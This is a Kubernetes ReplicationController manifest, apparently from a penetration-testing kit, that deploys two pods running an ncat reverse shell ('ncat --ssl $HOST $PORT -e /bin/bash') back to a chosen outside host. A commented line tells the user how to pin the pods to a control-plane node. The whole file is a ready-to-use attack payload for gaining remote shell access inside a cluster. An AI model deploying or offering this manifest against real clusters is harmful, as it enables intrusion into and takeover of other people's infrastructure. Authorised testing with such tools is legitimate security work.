apiVersion: v1
kind: ReplicationController
metadata:
  name: nothing-allowed-revshell-replicationcontroller
  labels:
    app: pentest
    type: replicationcontroller
spec:
  replicas: 2
  selector:
    app: pentest
    type: replicationcontroller
  template:
    metadata:
      labels:
        app: pentest
        type: replicationcontroller
    spec:
      containers:
      - name: nothing-allowed-revshell-replicationcontroller
        image: raesene/ncat
        command: [ "/bin/sh", "-c", "--" ]
        args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ]
      #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
      